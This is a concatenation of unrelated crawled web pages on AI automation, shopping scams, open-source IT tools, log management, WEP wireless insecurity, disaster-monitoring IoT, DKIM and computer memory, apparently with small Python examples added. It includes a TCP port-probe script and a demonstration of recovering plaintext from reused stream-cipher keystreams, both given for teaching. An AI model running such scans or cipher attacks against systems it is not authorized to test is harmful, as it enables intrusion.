- Process discovery can use AI to track behavior in real time and extract insights based on that behavior, identifying bottlenecks and opportunities for improvements. After the discovery process, it generates a process map to help your teams develop more automations. - Intelligent document processing (IDP) uses machine learning (ML) for data processing. IDP can extract and validate data from structured and semi-structured documents such as invoices, purchase orders, and application forms. By implementing gen AI, IDP can move beyond process validation to understand the context and purpose of a document and interpret how that data should be used, bringing you a faster time to market. Gen AI elevates each stage of the automation development lifecycle, from process discovery to build, ongoing management, and monitoring. SS&C Blue Prism has partnered with AWS to develop secure and private IA solutions that incorporate enterprise-grade generative AI. How Do I Use AI and Automation? AI automation has a lot of versatility. It can help organizations improve efficiency, reduce errors, and enhance their decision-making processes. Let’s look at some industry use cases: What are examples of AI automation? - Customer service: Let’s say a customer has an issue and they’re looking for an immediate resolution. AI-powered solutions can resolve customer complaints quickly or escalate issues to a service agent for more nuanced cases – ensuring your customers have a streamlined journey to resolution. - Financial services and banking: IA can digitize the loan process and streamline administrative processes such as know-your-customer (KYC) ID verification and anti-money laundering (AML) reporting. AI algorithms can analyze transaction data in real-time to detect unusual patterns and potentially fraudulent activities. - Insurance: IA can streamline many routine tasks in insurance, including underwriting, claims processing, regulatory compliance, and fraud detection. 
Digital workers can automatically collect data from multiple or disconnected sources and send relevant notifications to agents to speed up the claims decision process. - Manufacturing: With AI-backed analytics, manufacturers can reduce unplanned downtime and improve their efficiency and product quality. AI can analyze supply chain data to optimize inventory levels and distribution routes. IA also helps with predictive maintenance, identifying slowdowns causing yield losses. - Healthcare: Automation can help patients book appointments and help clinical staff organize patient medical records and history. AI can assist in medical diagnoses by analyzing medical images like X-rays and MRIs so doctors can identify issues and get patients the right treatment faster. Gen AI is an ever-evolving field with a lot to offer organizations. Expand your automation plans with generative AI use cases. What Are the Benefits of AI Automation? More organizations turn to AI-powered automation because of the business benefits. AI's huge processing power increases the speed, efficiency, and scalability of your automations, helping you achieve a better return on investment (ROI). An AI automated assistant augments your team's work by actioning AI use cases across systems, from summarizing content to providing valuable decision-making insights. AI systems can process vast amounts of data at high speeds, 24/7. Automated systems provide higher-quality, more reliable, and consistent outputs – be that customer service, products, or a range of services. Scalability and integration By implementing good data, your gen AI can grow your operations at speed while maintaining security and compliance. It can use natural language to make automation requests across systems and generate personalized and summarized content for easier access to relevant information.
Automated systems help improve consistency and accuracy, and optimize resource allocation, which can then accelerate productivity and reduce costs associated with duplicated effort and rework. Generative AI changes the nature of work and empowers people to think about your organization’s automation journey differently. Gen AI enables non-tech developers to use natural language prompts to quickly create automations following best practice guidelines and regulations. How Does AI Automation Software Work? There are many types of artificial intelligence software. Before selecting an automation tool, consider what your business goals are and what sort of processes you want to automate. Let’s look at some important aspects of AI automation software. Foundational models are pre-trained models serving as the foundation for a wide range of NLP and other AI tasks. These models are typically trained on vast amounts of text and data so they can learn to understand and generate human-like language and be fine-tuned for specific applications. An example of foundational model development is the generative pre-trained transformer (GPT-3), released by OpenAI in 2020. Cloud automation allows organizations to work without delays or relying on specialist skills while maintaining a high level of security and governance. Cloud aims to lower the total cost of ownership so organizations can deploy, support, and upgrade their automation program fully on the cloud. Many cloud providers also offer hybrid cloud deployment options. An example is SS&C | Blue Prism® Cloud, which combines IA with the cloud to bring a fully hosted and managed platform delivered from the Microsoft Azure or AWS cloud. SS&C | Blue Prism® Next Generation is our cloud-native IA platform that enables you to deploy your digital workers from a single, unified platform to simplify management across your enterprise. AI-powered solutions, and especially generative AI, are growing technological innovations. 
As regulations around these technologies evolve, it's imperative your organization ensures compliance and data safety before application deployment. Here are some considerations to keep in mind: - Quality model: Integrate with high-quality enterprise large language models (LLMs) capable of protecting your data. - Human-in-the-loop: Build human oversight into AI-powered automations to ensure the outputs are accurate and aligned with your business models. - Continuously monitor: Set up audit trails for your automations and track user activity to prevent unauthorized access and ensure compliance. - Establish parameters: Ensure you give access to the right users to keep your and your customers' data secure. - AI governance: Monitor your AI activities, including AI model documentation and auditing pipelines, to show how your AI is trained and tested, how it behaves throughout its lifecycle, and any potential risks. AI governance is especially important in heavily regulated industries, as it helps avoid penalties and ensures transparency. Find out how to prepare for this next evolution with our generative AI survival guide. We've learned that AI automation, or intelligent automation, uses the cognitive 'thinking' capabilities of AI linked with the 'task performing' of RPA to streamline business processes. And now, with gen AI emerging, the automation possibilities just got a lot broader. Here are your key takeaways for automating more with AI: - Ensure AI governance and good data security and quality for your AI training models. - Consider the use cases of intelligent automation in your business and how you can reap the best benefits. - Develop a plan for your automation before deployment.
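The chatbot hand-off pattern described earlier — answer routine queries automatically and escalate low-confidence cases to a human agent — can be sketched in a few lines. This is a toy illustration only: the tiny knowledge base, the confidence scores, and the 0.6 threshold are all made-up assumptions, not part of any specific product's API.

```python
# Toy sketch of a chatbot with human-in-the-loop escalation.
# The knowledge base and the 0.6 threshold are illustrative assumptions.
KNOWN_ANSWERS = {
    "opening hours": ("We are open 9am-5pm, Monday to Friday.", 0.95),
    "reset password": ("Use the 'Forgot password' link on the login page.", 0.90),
}

def handle_query(query, threshold=0.6):
    """Return (reply, escalated) for a customer query."""
    for topic, (reply, confidence) in KNOWN_ANSWERS.items():
        if topic in query.lower() and confidence >= threshold:
            return reply, False          # bot answers instantly
    # No confident match: hand the conversation to a human agent
    return "Transferring you to a human agent...", True

reply, escalated = handle_query("What are your opening hours?")
print(reply, escalated)   # answered by the bot, escalated is False
reply, escalated = handle_query("My invoice is wrong and I want a refund")
print(reply, escalated)   # no confident match, escalated is True
```

The key design point is the threshold check: the bot only answers when it is confident, which keeps wait times low for routine questions while routing nuanced cases to people.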
<urn:uuid:20509b37-3069-4675-b4b3-a14f0bda45a1>
CC-MAIN-2024-38
https://www.blueprism.com/guides/ai-automation/?ref=digitalaijournal.com
2024-09-12T07:13:50Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00296.warc.gz
en
0.926667
2,235
2.828125
3
Cyberhackers are constantly strengthening their tactics to trick you into giving them your confidential information, especially during the holidays. Here are some of the most common scams happening throughout the holiday shopping season: - Fake Charities and Fundraisers: Receiving calls or emails asking for donations. You think you're giving your payment information to a staff member, when it's just a cyberhacker convincing you to give them your information. - Fake Shipping Notifications: You will receive an email regarding a package, but attached within that email is a malware link. If you didn't order anything or don't recognize the order, don't open the email. - Amazon Scam Email: The hacker sends a fake email claiming the package you ordered cannot be delivered, prompting you to enter your personal information. The email warns you to enter your information, or you won't be able to access your Amazon account in the future. - Downloading Mobile Applications: Pay attention to what free apps you download. Some apps are impersonators designed to steal personal information that has been stored within your device. If you question the credibility of the app, it most likely is a fake. - Free Wi-Fi: Open networks give hackers access to your device, where your personal information, such as credit cards, is stored. To prevent sharing your confidential information, turn off file sharing while connected to free or open Wi-Fi networks.
<urn:uuid:636d723a-c635-42ff-96f9-884b3450b7a2>
CC-MAIN-2024-38
https://www.centaris.com/2016/12/holiday-shopping-scams/
2024-09-15T20:16:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00896.warc.gz
en
0.907737
299
2.578125
3
Open Source Tools Every IT Pro Needs to Know Open source is no longer a small part of the IT community. It's a major part of any IT organization for both software development and operations. Open source is a community of IT professionals that give back with free code and tools that can be used in a variety of sectors. If you're an IT professional, here are a few open source tools that you should get acquainted with. We've compiled some development tools as well as operations tools to help you perform better and faster. Operations: Packet Analysis Packet analysis takes complex skills, but you don't have to pay for the right tools. Wireshark is the Number 1 packet analysis tool for operations. If you have suspicious network traffic or need to review packet requests for certain services, you can download Wireshark and get started. This tool is one of the open source community's favorites, so there is plenty of support and tutorials to get you started. Operations: Nmap Do you know what is attached to your network? It's common for IT systems to get out of control as the business grows and more resources are attached to the internal LAN. Nmap is a lightweight open-source program that can help you detect resources on the network. You can even create a "map" of system resources that can be useful for planning and architecture reviews. Development: Deploying Software How long does it take to deploy software to your servers? With Jenkins, you can completely automate the process. Jenkins lets you create scripts that copy files, edit directories, and even call commands on the remote server. It also keeps a repository of all changes, so you can review the updates you've made on your servers. It's perfect for enterprise environments where you're forced to deploy to several servers at once. Development: GitHub Code Repository Most organizations have several software projects in development. 
Your developers can make tools and create code that works within the organization and isn't a part of a main project. GitHub is an open-source code repository that you can use to manage change control and additions to the current code base. It can be your main repository, or you can use it in addition to other solutions. Operations: Logging Every organization needs a logging tool, and Logz.io offers a way to have a repository and aggregation of your logs for all of your servers and network resources. This tool is great for system administrators that need to monitor several resources across a large network. With this tool, you can aggregate your data, run statistics and review reports for better monitoring and security auditing. Operations: Server and Network Configurations When you deploy dozens of servers across an environment, it's tedious to configure every server and remember to keep configurations uniform. You can overcome this hurdle using Chef. Chef is a configuration automation tool. Similar to Jenkins, it lets you deploy configuration using scripts. Change your script and reconfigure all of your servers on the network. This tool cuts down on hours of configuration deployment and maintenance. Operations and Development: Agile Management Solutions Operations and development must be able to manage projects together. Most IT infrastructure changes affect software on the system, and any development tools must be supported by the operations department. To fully understand changes, the two teams must work together. Agile is a common methodology to handle these changes, but to get the work done you need a reliable tool. Elasticbox is one such tool that brings the two departments together, so they can manage projects in one interface using the Agile methodology. 
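As a toy illustration of the host-and-port discovery that Nmap automates at much larger scale, the sketch below probes a handful of TCP ports on a single host using only Python's standard library. The port list is an arbitrary assumption; Nmap itself is far faster and adds capabilities like service and OS fingerprinting that this sketch does not attempt.

```python
import socket

def probe_ports(host, ports, timeout=0.5):
    """Return the subset of TCP ports that accept a connection on host."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 when the TCP handshake succeeds
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

# Probe a few well-known ports on the local machine; only scan
# hosts you are authorized to scan.
print(probe_ports("127.0.0.1", [22, 80, 443, 8080]))
```

The equivalent Nmap invocation would scan whole subnets in one command, which is why a dedicated tool beats hand-rolled scripts for real inventory work.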
This list of tools is a must-have for any IT organization, but there are numerous others on the market provided by people who understand the importance of having the right automation, development and management. The open-source community is strong, and you'll find plenty of support for many of the popular applications we listed.
<urn:uuid:58575f4a-c19b-4eb7-9fee-7a9e2d704478>
CC-MAIN-2024-38
https://www.cbtnuggets.com/blog/career/career-progression/open-source-tools-every-it-pro-needs-to-know
2024-09-17T01:20:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00796.warc.gz
en
0.947583
791
2.828125
3
Log Management is crucial to IT operations and security, allowing organizations to collect, analyze, and store log data generated by various IT systems, applications, and devices. Log data can provide valuable insights into an organization's IT operations and security posture, helping them detect and resolve issues, comply with regulatory requirements, and improve overall IT performance. However, with the vast amounts of log data generated by modern IT environments, managing logs can be challenging and time-consuming, especially for large organizations with complex IT infrastructures. Effective log management requires a robust strategy, including log collection, analysis, storage, and retention. In this article, we'll explore the four essential steps of log management and the best practices that every IT professional should know. What is Log Management? Log Management is the process of collecting, analyzing, and storing log data generated by various IT systems, applications, and devices. Logs are a record of events, transactions, and activities in an IT environment that provide valuable insights into IT operations, security incidents, and application performance. Log Management involves four important steps: collection, analysis, storage, and retention. It also includes the use of log management tools and techniques to manage and process log data efficiently. A well-designed Log Management system can help organizations streamline their IT operations, comply with regulatory requirements, and enhance their overall security posture. Types of logs Logs can be generated by various IT systems, applications, and devices, and they come in different formats and content. Some common types of logs include the following: - System logs: They contain information about system events, such as startup and shutdown events, hardware errors, and system crashes. 
- Application logs: They contain information about application events, such as user activities, errors, and performance metrics. - Security logs: They contain information about security-related events, such as login attempts, authentication failures, and malware infections. - Network logs: They contain information about network traffic, such as IP addresses, protocols, and ports. - Audit logs: They contain information about user activities and changes made to the IT environment. 4 key steps in a log management process Log Management helps to improve IT performance and security. It is essential to any organization's IT strategy, especially for those who rely heavily on technology. Here are the four key steps in a log management process: Step 1: Log collection Log collection is the process of collecting log data from various IT systems, applications, and devices. There are both agent-based and agentless techniques for log collection: - Agent-based log collection: It involves installing software agents on IT systems and devices to collect log data. - Agentless log collection: It involves using network protocols and APIs to collect log data directly from IT systems and devices. The choice of log collection technique depends on various factors, such as the IT environment's complexity, the number of IT systems and devices, and the level of control required over log collection. Best practices for log collection include: - Identifying critical log data. - Reducing noise and redundancy in log data. - Implementing security measures to protect log data from unauthorized access. Step 2: Log analysis Log analysis is the process of using log data to identify issues, monitor IT operations, and improve IT performance. There are several tools and techniques for log analysis, such as: - Log parsing: It involves extracting specific data from log files, such as timestamps, IP addresses, and error codes.
- Log correlation: It involves analyzing log data from multiple sources to identify patterns and relationships. - Log visualization: It involves presenting log data in graphical formats, such as charts and graphs, to make it easier to understand and interpret. Log analysis can help organizations detect and resolve issues quickly, identify trends and patterns, and make informed decisions. It can also help organizations comply with regulatory requirements and enhance their overall security posture. Step 3: Log storage Storing logs in a centralized location can help organizations manage log data efficiently and facilitate log analysis. There are different storage options for logs, such as: - Local storage: It involves storing log data on local disks or storage devices. - Cloud storage: It involves storing log data in cloud-based storage services, such as Amazon S3 or Microsoft Azure. - Hybrid storage: It involves storing log data both locally and in the cloud. It is essential to choose a storage solution that meets the organization's needs for scalability, accessibility, and compliance. Step 4: Log retention Log retention policies define how long organizations should retain log data. Retention policies should consider various factors, such as regulatory requirements, business needs, and storage capacity. Retaining logs for too long can lead to storage issues and make log analysis more challenging. On the other hand, retaining logs for too short a period can limit an organization's ability to detect and investigate security incidents and other issues. Log Management best practices Effective Log Management requires more than just collecting, analyzing, storing, and retaining log data. It requires a comprehensive approach that includes best practices for Log Management. Here are some of them: 1. Define a clear Log Management policy Start by defining a clear Log Management policy that outlines Log Management's purpose, scope, and objectives. 
The policy should also define roles and responsibilities, data retention periods, and data disposal procedures. It should also be aligned with the organization's overall IT strategy and regulatory compliance requirements. 2. Collect relevant data Collect only the logs that are relevant to your organization's needs. Collecting too much data can make it difficult to analyze and store logs efficiently, increasing costs and making it harder to detect security threats. Focus on collecting data that provides insight into critical systems, applications, and infrastructure. 3. Use log management tools Use Log Management tools that can help you automate log collection, analysis, and storage. These tools can provide real-time visibility into system performance and security, reduce the time and effort required to manage logs, and help you identify security threats quickly. 4. Regularly review log data Regularly review log data to identify security threats, system issues, and other anomalies. Set up alerts to notify IT teams of critical events and incidents that require immediate attention. Review logs regularly to identify patterns, trends, and changes in system behavior. 5. Ensure log data integrity Ensure the integrity of log data by implementing strong authentication and access control measures. Ensure that logs are encrypted during transmission and storage to protect them from unauthorized access. Verify that log data is tamper-proof by using secure hashing and digital signatures. 6. Monitor Log Management performance Monitor Log Management performance to ensure that log data is being collected, analyzed, stored, and retained effectively. Measure Key Performance Indicators (KPIs) such as data volume, data quality, log retention compliance, and incident response times. Use this information to identify areas for improvement and optimize log management processes. Log Management is a critical component of any organization's IT strategy. 
It provides real-time visibility into system performance and security, helps detect security threats quickly, troubleshoots system issues, and optimizes IT performance. A comprehensive Log Management process includes four key steps: log collection, log analysis, log storage, and log retention. Effective log management also requires implementing best practices, so organizations can improve their log management processes, reduce the risk of security breaches, and improve system performance. Log management is not a one-time effort but a continuous process requiring ongoing attention and monitoring. With the right tools, processes, and people in place, organizations can master log management and achieve a more secure and reliable IT environment.
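The log-parsing technique described under "Log analysis" — pulling timestamps, IP addresses, and error codes out of raw lines — can be sketched with a regular expression. The log format below is a fabricated example for illustration; real deployments adapt the pattern to whatever format their systems actually emit.

```python
import re

# Hypothetical log format: "2024-09-18 08:32:04 192.168.1.10 ERROR 500 ..."
LINE_RE = re.compile(
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"(?P<level>[A-Z]+) (?P<code>\d{3})"
)

def parse_line(line):
    """Extract timestamp, IP, level, and status code from one log line."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

rec = parse_line("2024-09-18 08:32:04 192.168.1.10 ERROR 500 upstream timeout")
print(rec)
# {'ts': '2024-09-18 08:32:04', 'ip': '192.168.1.10', 'level': 'ERROR', 'code': '500'}
```

Once lines are structured like this, the correlation and visualization steps become straightforward aggregation over the extracted fields.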
<urn:uuid:c7cafad3-a39d-4f40-adf8-a3b613b48742>
CC-MAIN-2024-38
https://blog.invgate.com/log-management
2024-09-18T08:32:04Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651886.88/warc/CC-MAIN-20240918064858-20240918094858-00696.warc.gz
en
0.926998
1,563
3.046875
3
Around the world, hackers are “war driving” through office districts, gathering unprotected data from wireless networks. Corporations and governments are spilling their secrets into the streets, and managers do not realize how vulnerable their networks are. Even more frightening, they may not even know that a base station is attached to their network, transmitting confidential information to anyone with a laptop, a wireless card and some simple software. Jim Geier, a computer consultant who helped to develop wireless local area network (WLAN) standards, is busy these days conducting two-day workshops on wireless network security. The 802.11 standard was finalized in 1997, he said, but it took some time for prices to drop and speeds to increase. “When that happened, corporations saw that the performance at least matched with their typical Ethernet capability and that is when it started taking off,” Geier said. According to Dr. Ian Goldberg of Montreal-based Zero Knowledge Systems Inc., part of the problem is the user-friendliness of the technology. “In companies – and I don’t know about the public sector – but in companies, it is not unheard of for employees to just bring equipment to work and plug it in,” Goldberg said. Even when IT managers know they have deployed 802.11 networks, they may forget that they are wireless. “A lot of the time, it just slips their minds that the radio waves don’t stop at your building wall and they can be accessed from a good distance away,” said Goldberg. “A $40 antenna can capture signals from several miles away. I think the record has been 26 miles.” The data that travels over 802.11 is protected, but Jim Geier says U.S. government policy banning the export of high technology has made it easy for hackers to break in. “The 802.11 network has security, so you can use encryption keys to encrypt the data that is being sent between the user and the access point where it is connected to the network,” Geier said.
“But the encryption keys were kept fairly weak, mainly to make it easier to export products based on that standard, so the encryption mechanism itself is inherently weak.” The encryption keys themselves are “static” sets of numbers, meaning they stay the same until someone or something changes them. “The administrators are reluctant to change these keys very often because it’s difficult and they have to go out to each end user and have them change numbers to match,” Geier said. These days, hackers are eager to pursue any vulnerability, so companies have developed “sniffing” software that looks at data packets being sent from 802.11 devices. “After collecting roughly 1,000 packets, it can take that and determine what the keys are and tell you what it is,” Geier said. “That can be done on an active network in just a few hours. These tools are available off the Internet for free. So basically the 802.11 security today is useless for all practical purposes.” Firms that make 802.11 products have incorporated enhanced security features into their high-end wireless LAN parts, but these measures are proprietary, meaning buyers who want to expand a network are locked into technology from that company. This is unacceptable for IT administrators who are bound by policy or preference to use only open systems. Getting around the security limitations of today’s 802.11 networks means accepting a drop in performance, adding more equipment or both. Ian Goldberg said managers should insist on the same security measures that apply to other devices reaching the network from the outside. “The wireless network is exactly as insecure as the public Internet,” Goldberg said. “Whatever firewalls you have between your internal network and the Internet, you should have the same thing connected to the wireless network. 
Just plug your wireless network in where the Internet comes in, before the firewall.” Users love WLANs because they eliminate the bother of physically attaching laptop and handheld computers to their organization’s networks. In the last few years, administrators have purchased thousands of 802.11 networks because they are affordable, easy to install and quickly reconfigured, little realizing how thinly they are shielded from prying eyes. New standards will bring higher levels of security to 802.11 networks within a year or two, but in the meantime, many organizations with wireless networks need to find out whether they have added a new business line – public broadcasting.
Richard Bray is an Ottawa-based writer with an extensive background in public policy journalism. A former producer and reporter with CBC News, he is a specialist in high-tech issues.
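The danger of the static keys Geier describes can be shown with a toy example. One of the classic failures of weak stream-cipher setups like early WEP is keystream reuse: when two messages are encrypted with the same keystream, XORing the two ciphertexts cancels the key entirely, leaving the XOR of the plaintexts — no key recovery needed. The sketch below is a simplified illustration of that property, not WEP's actual RC4 construction.

```python
def xor_bytes(a, b):
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))

# A static "keystream" reused for every message (the fatal mistake)
keystream = bytes([0x5A, 0x13, 0xC7, 0x99, 0x21, 0x6E, 0x42, 0x8D]) * 4

p1 = b"TRANSFER $500 TO ACCT 1234"
p2 = b"TRANSFER $900 TO ACCT 9999"
c1 = xor_bytes(p1, keystream)   # what an eavesdropper captures
c2 = xor_bytes(p2, keystream)

# Same keystream twice: c1 XOR c2 == p1 XOR p2 -- the key drops out.
assert xor_bytes(c1, c2) == xor_bytes(p1, p2)

# Knowing (or guessing) one plaintext instantly reveals the other:
recovered = xor_bytes(xor_bytes(c1, c2), p1)
print(recovered)  # b'TRANSFER $900 TO ACCT 9999'
```

Real attacks on WEP exploited related statistical weaknesses, which is why rotating keys — and, ultimately, replacement standards — were needed.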
<urn:uuid:e0e4a064-0fdf-4f39-b316-827272604f98>
CC-MAIN-2024-38
https://www.itworldcanada.com/article/when-private-networks-arent-so-private/23863
2024-09-19T14:07:55Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00596.warc.gz
en
0.969544
985
2.765625
3
The natural disaster detection IoT market is projected to grow from $6.6bn in 2023 to $37.3bn by 2030, at a Compound Annual Growth Rate (CAGR) of 27.85%, according to 360iResearch. Natural disasters are a growing phenomenon, due to rising temperatures and climate change. IoT has an important role to play in monitoring environments and detecting natural disasters. It can help to warn, and somewhat mitigate the risk to, vulnerable populations, wildlife and commercial centers from events such as earthquakes, landslides, tsunamis, hurricanes, flooding, wildfire and temperature extremes. Further, technologies such as Machine Learning (ML) and Artificial Intelligence (AI) are helping to predict, measure and pre-empt environmental change. This minimizes costs both in terms of lives, businesses, and urban infrastructure. This innovative use of technology will help save lives through preventive measures and early warning systems. But while global warming is – the clue is in the name – a global concern, early detection and data insight aren't happening at the same rate across the globe. Worryingly, in the same parts of the globe where early detection is needed most, the data to facilitate this is missing or not being gathered. With the growth of IoT connectivity, all countries should be able to utilize environmental monitoring and disaster recovery data to their advantage, but this isn't actually the case. The Problem of Missing Data The problem of ‘missing data’ forms part of an environment research paper for iopscience. The authors report that data gaps and missing data are commonplace across real world datasets, including global disaster databases. Global disaster databases, and recorded disaster data, are increasingly utilized by decision-makers and researchers to inform disaster mitigation and climate policies. So with significant chunks of data missing, the researchers question the conclusions drawn and the risks of unreliable study results.
After all, a reliable evidence base is a prerequisite for effective decision making. So why is there an inconsistency in the data that is gathered, and why are some countries not collecting the data they need? There are numerous reasons cited, including technological limitations in the surveillance of disaster events (which we will explore in more detail here), and factors such as the income status of the affected country, and the types of disaster event that occur. Global disaster databases, and analysis of their impacts, are largely produced by research organizations in western nations. This means that there is a bias towards events in these countries. It’s an ‘unnatural disaster’ that some parts of the globe are still not able to monitor and measure the environmental changes that could save lives. The commercial world is being called upon to build the infrastructure needed to supply NGOs, local communities and emergency services with the information they desperately need. Fixed sensors can capture temperature change, rising water levels, earthquake shock readings; drones can monitor volcanic activity and large bodies of water. This information delivers the insight necessary to inform and reduce loss of life. However, this comes with some significant investment, namely the network infrastructure needed to transmit the data, and ongoing funding – hence there being more complete data sets from countries of higher economic GDP. If the infrastructure does not exist to support environmental monitoring, or research is inhibited by poor or intermittent cellular connectivity, what can be done? Terrestrial networks are expensive to set up, and vulnerable themselves to natural disasters. As we reported in an earlier blog post, during a prolonged spell of rain in 2022, 1,200 cell towers were impacted in South Africa alone due to flooding and landslides.
Many countries and localities are simply not equipped to provide the power or networking to support cellular IoT. Not only is network coverage much lower in least developed countries than in the rest of the world, but mobile data usage can also be significantly more expensive. Solving the Communications Infrastructure Problem Satellite IoT can solve the communications infrastructure problem. It provides global connectivity to locations where cellular connectivity is missing or intermittent, enabling the kind of sensor data required for environmental monitoring to be transferred to and from the farthest reaches of the earth. All that’s needed is a satellite transceiver, antenna and clear view of the sky.
<urn:uuid:f4070a0d-5341-4c4e-871e-e453d99a3be3>
CC-MAIN-2024-38
https://www.groundcontrol.com/blog/data-inconsistencies-in-global-disaster-monitoring/
2024-09-20T20:57:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00496.warc.gz
en
0.944669
855
3.171875
3
DomainKeys Identified Mail (DKIM): Improve Secure Email Deliverability and Prevent Spam DomainKeys Identified Mail (DKIM) is an email security standard that protects your domain name from email spoofing, ensures emails aren't altered during transit, and prevents outgoing emails from getting marked as spam. DKIM attaches a digital signature to the email and provides a key for destination servers to authenticate the signature. The DKIM authentication method proves the legitimacy of an email and improves the chances of protecting your domain name from harmful impersonations. How Does DKIM Work? DKIM creates and attaches a digital signature to every outgoing email. This signature verifies to the receiving email server that the email is authentic. But how can servers confirm the signature is legitimate and not a forgery? The answer is by using cryptography keys. DKIM generates two keys: a private key and a public key. The private key is kept on the outgoing email server, and its purpose is to provide a signature to outgoing emails. The public key is kept on the DNS server, and Internet Service Providers (ISPs) can access it when they receive a DKIM-signed email. If the keys match, the email is deemed authentic and is delivered to the inbox. The DKIM authentication method is beneficial for both senders and recipients. Senders can ensure their emails are delivered, while recipients worry less about receiving spoofed emails or other types of spam. Why Is DKIM Important in Cybersecurity? With DKIM authentication, organizations can increase email deliverability and reduce email spoofing. Senders like DKIM because it helps ensure emails are delivered to a recipient's inbox. Recipients like DKIM because it helps keep spam and malicious emails out of their inboxes. Email servers can check the DKIM signature to determine if an organization actually sent the email. This verification process lowers the chances of emails getting marked as spam or getting blocked entirely. 
By adding an email authentication process like DKIM, organizations may see an improvement in email deliverability. Email spoofing is a common phishing attack, and DKIM is notable for helping prevent spoofing. Since spoofing relies on a forged sender address to trick a recipient into thinking the email is legitimate, DKIM can verify the sender's identity. What Is a DKIM Record? A DKIM record is stored in the DNS and consists of a modified TXT record. The TXT record contains the public key used to verify a DKIM-signed email. What Is a DKIM Selector? A selector is a value within the DKIM signature that points to the location of a public key within the DNS. This allows an email server to authenticate an incoming email by matching it with the right key. Since domains may have multiple public keys, the selector value ensures recipients are finding the correct key which matches their DKIM-signed email. Here is an example of what a DKIM signature looks like: DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=sampledomain.com; s=selector; i=email@example.com This example contains the following parts: v=1: DKIM version used by the outgoing email server a=rsa-sha256: Algorithm used to generate the hash for the private and public keys c=relaxed/relaxed: Sets the canonicalization posture for the sending domain d=: Email domain of the sender s=: Selector value to find the right public key for authentication i=: Identity of the sender A DKIM signature will also include information on the headers included within the message, the value of the generated body hash, and the cryptographic signature. How Does DKIM Work With SPF and DMARC? DKIM is one of three standard email authentication methods. These methods help protect against spoofing and phishing attacks. They can also help prevent authentic emails from your organization from getting marked as spam. 
Here is a brief overview of each email authentication method: DKIM: Adds a digital signature to outgoing messages whose authenticity is proven with a cryptography key Sender Policy Framework (SPF): Identifies servers that are authorized to send messages using the domain name Domain-Based Message Authentication, Reporting, and Conformance (DMARC): Sets up a process on what to do with emails if they don't pass DKIM or SPF authentication SPF, DKIM, and DMARC work together to authenticate and deliver emails. An organization should have all three standard email authentication methods in place but many don't implement these tools. This could turn into a costly mistake because it increases the risk of employees receiving spoofed emails and phishing scams. Traditional Email Security vs. Abnormal Security While DKIM is an important aspect of email authentication security, it can only protect so much alone. That's why it's important to also implement SPF and DMARC authentication methods. These tools work together to create a multi-layered approach to validating the authenticity of emails. Organizations shouldn't rely on built-in security from their email provider. Oftentimes, email providers don't have the advanced security protocols needed to protect inboxes against modern email threats. Abnormal Security uses modern technology to combat the ever-evolving landscape of cybercrimes. It uses behavioral analysis and contextual language clues to detect phishing and other cyberattacks. Our technology can: Integrate with the cloud Automatically remediate suspicious emails Spot suspicious login behavior Detect unusual financial requests Notice manufactured urgency To learn more about how Abnormal prevents email spoofing, request a demo today.
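The DKIM-Signature header described earlier is a semicolon-separated list of tag=value pairs, which makes it straightforward to inspect programmatically. Below is a minimal sketch in Python (standard library only) that splits such a header into its tags; the sample header values are illustrative, not taken from a real message.

```python
# Split a DKIM-Signature header value into a {tag: value} dict.
# The tag=value list format follows RFC 6376; sample values are illustrative.

def parse_dkim_signature(header: str) -> dict:
    """Parse a DKIM-Signature header value into its tag=value pairs."""
    tags = {}
    for part in header.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        # partition() splits only at the first "=", so values like
        # "i=email@example.com" keep any later "=" characters intact.
        tag, _, value = part.partition("=")
        tags[tag.strip()] = value.strip()
    return tags

sample = ("v=1; a=rsa-sha256; c=relaxed/relaxed; "
          "d=sampledomain.com; s=selector; i=email@example.com")
parsed = parse_dkim_signature(sample)
print(parsed["d"])  # sampledomain.com
print(parsed["s"])  # selector
```

A receiving server would use the `d=` and `s=` values from such a parse to look up the public key at `selector._domainkey.sampledomain.com` before verifying the signature.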
<urn:uuid:04083cad-9207-4841-9069-b16886e07ce8>
CC-MAIN-2024-38
https://abnormalsecurity.com/glossary/dkim
2024-09-08T15:33:20Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00760.warc.gz
en
0.905256
1,168
3.21875
3
Memory is a finite resource when it comes to both humans and computers—it’s one of the most common causes of computer issues. And if you’ve ever left the house without your keys, you know memory is one of the most common human problems, too. If you’re unclear about the different types of memory in your computer, it makes pinpointing the cause of computer problems that much harder. You might hear folks use the terms memory and storage interchangeably, but there are some important differences. Understanding how both components work can help you understand what kind of computer you need, diagnose problems you’re having, and know when it’s time to consider upgrades. The Difference Between RAM and Storage Random access memory (RAM) and storage are both forms of computer memory, but they serve different functions. What Is RAM? RAM is volatile memory used by the computer’s processor to store and quickly access data that is actively being used or processed. Volatile memory maintains data only while the device is powered on. RAM takes the form of computer chips—integrated circuits—that are either soldered directly onto the main logic board of your computer or installed in memory modules that go in sockets on your computer’s logic board. You can think of it like a desk—it’s where your computer gets work done. When you double-click on an app, open a document, or do much of anything, part of your “desk” is covered and can’t be used by anything else. As you open more files, it is like covering your desk with more and more items. Using a desk with a handful of files is easy, but a desk that is covered with a bunch of stuff gets difficult to use. What Is Computer Storage? On the other hand, storage is used for long-term data retention, like a hard disk drive (HDD) or solid state 